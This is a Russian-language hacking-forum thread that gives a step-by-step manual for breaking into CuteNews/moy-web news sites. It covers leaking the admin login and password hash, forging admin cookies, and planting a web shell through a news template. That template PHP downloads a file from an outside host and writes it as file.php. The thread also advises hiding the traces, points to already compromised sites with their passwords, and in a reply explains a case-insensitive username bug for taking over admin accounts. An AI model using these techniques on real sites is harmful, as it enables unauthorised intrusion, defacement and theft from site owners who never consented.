[Взлом] Ещё один (но упрощеный) мануал по взлому CuteNews

Тема в разделе "Статьи и Co", создана пользователем Netprostor, 26 ноя 2008.

Статус темы:
Закрыта.
  1. Netprostor

    Netprostor Писатель

    Регистр.:
    29 окт 2008
    Сообщения:
    9
    Симпатии:
    5
    Мануал по взлому CuteNews, в частности сайтов на движке moy-web.

    Взлом moy-web уже такая заезженная тема, но Перейти по ссылке всподвиг меня на написание ещё одного мануала.
    Сайты на moy-web'е постоянно появляются новые, найти их очень просто: Перейти по ссылке

    Скачиваем:
    Перейти по ссылке
    Перейти по ссылке


    1. Находим сайт на движке moy-web. Удобно искать запросами, которые я написал выше.
    2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php
    3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
    4. Теперь нам надо узнать логин админа, для этого переходим Перейти по ссылке и вводим полный путь к search.php
    5. Получили логин админа и теперь узнаем хэш админа, для этого переходим Перейти по ссылке и вводим Логин (у меня root) и путь к файлу search.php
    6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)

    Устанавливаем Перейти по ссылке для него.
    Дальше идем Инструменты=>Редактор Cookies=>Добавить
    Заполняем:
    1. Имя=>username
    2. Содержимое=>Логин администратора (у меня root)
    3. Узел=> путь к сайту (БЕЗ HTTP:// напр. Перейти по ссылке)
    4. Путь=>Путь к админке (у меня /news/)
    Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
    1. Имя=>md5_password
    2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
    3. Узел=> путь к сайту (БЕЗ Перейти по ссылке)
    4. Путь=>Путь к админке (у меня /news/)
    Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))

    Не спешите добавить похабную новость, давайте зальем туда шелл, что бы узнать пароли от mysql и вообще управлять содержимым сайта.

    Заливаем шелл:
    Настройкa блока новостей=>Редактировать шаблоны=>Активные новости
    Удаляем от туда всё и вставляем следующее:

    Код:
    HTML;
    $file = file_get_contents('http://shellss.by.ru/file.txt');
    $brd = fopen('file.php','w+');
    $write = fwrite($brd, $file);
    Сохранить…

    Через пару минут наш файл загрузится.
    Заходим .../news/file.php вводим логин-1 пароль-1
    Потом не забудьте изменить шаблон активных новостей "как было", что бы не спалиться.

    Вот пару готовых примеров, сильно их не пугайте тока)))

    Перейти по ссылке
    Перейти по ссылке

    Логин и пароль - 1
     
    deadked, semakos, lift и ещё 1-му нравится это.
  2. Netprostor

    Netprostor Писатель

    Регистр.:
    29 окт 2008
    Сообщения:
    9
    Симпатии:
    5
    Забыл упомянуть, что можно хэш найти напр. Перейти по ссылке, но их база содержит не все хэши, универсальным же способом остается запись куков.
     
    lift нравится это.
  3. deadked

    deadked Писатель

    Регистр.:
    22 авг 2009
    Сообщения:
    3
    Симпатии:
    0
    Не актуально, но всё-же. Что делать если нет файлика search.php а нужно ломануть определённый сайт?
     
  4. oxxxy

    oxxxy Постоялец

    Регистр.:
    30 авг 2009
    Сообщения:
    66
    Симпатии:
    5
    Все гораздо проще, бага работает вплоть до последней версии:
    Нужно: аккаунт с правами journalist или аккаунт с правами на сохранение настроек, знать логин админа (обычно пишется при добавление новости, но учтите иногда может писать не логин, а ник, если он указан, и он может отличаться от логина).

    Смотрим файл inc/options.mdu и видим в нём код:
    Код:
    foreach($old_user_db as $old_user_db_line){
                    $old_user_db_arr = explode("|", $old_user_db_line);
                    if(strtolower($username) != strtolower($old_user_db_arr[2])){
                            fwrite($new_user_db,"$old_user_db_line");
                    }
                    else{
                         if($editpassword != ""){
                         $old_user_db_arr[3] = md5($editpassword);
                         if($config_use_cookies == TRUE){ setcookie("md5_password", $old_user_db_arr[3]); }
                            $_SESSION['md5_password'] = $old_user_db_arr[3];
                         }
                         fwrite($new_user_db,"$old_user_db_arr[0]|$old_user_db_arr[1]|$old_user_db_arr[2]|$old_user_db_arr[3]|$editnickname|$editmail|$old_user_db_arr[6]|$edithidemail|$change_avatar|$old_user_db_arr[9]||\n");
                         $personal_success = TRUE;
                    }
            }  
    Суть в следующем - пусть на сайте есть админ с логином admin регистрируем пользователя ADMin (он сохраняется именно в таком виде), заходим под ним (с учётом регистра) - и... мы не более чем обычные пользователи, при проверке логина и пароля всё норм, но теперь идем в личные настройки и меняем пароль (не важно на какой). Из-за того что в коде стоит strtolower($username) != strtolower($old_user_db_arr[2]), то пароль поменяется для всех с ником admin не зависимо от регистра.
    Разлогиниваемся и логинимся, только теперь логин пишем не ADMin, а admin и тот новый пароль, который поставили при смене и получаем права админа.

    Внимание: учитывайте, что после всех этих действий админ не сможет зайти под своим аккаунтом - пароль, почта и т.д. - всё это поменяется. Единственное что можно сделать - это заранее запомнить почтовый адрес и уже с шелла, удалив нового админа (а палиться ни к чему), поставить старую почту настоящему админу.
    Можно и не менять пароль админу, а изменить только почтовый ящик, для этого при редактирование данных пишем нужный нам email, далее разлогиниваемся и делаем восстановление пароля на email.

    В результате чего на почту придёт линк подтверждения смены пароля, по нему не переходим, а берём из него хеш админа.

    За информацию спасибо Grey
     
Статус темы:
Закрыта.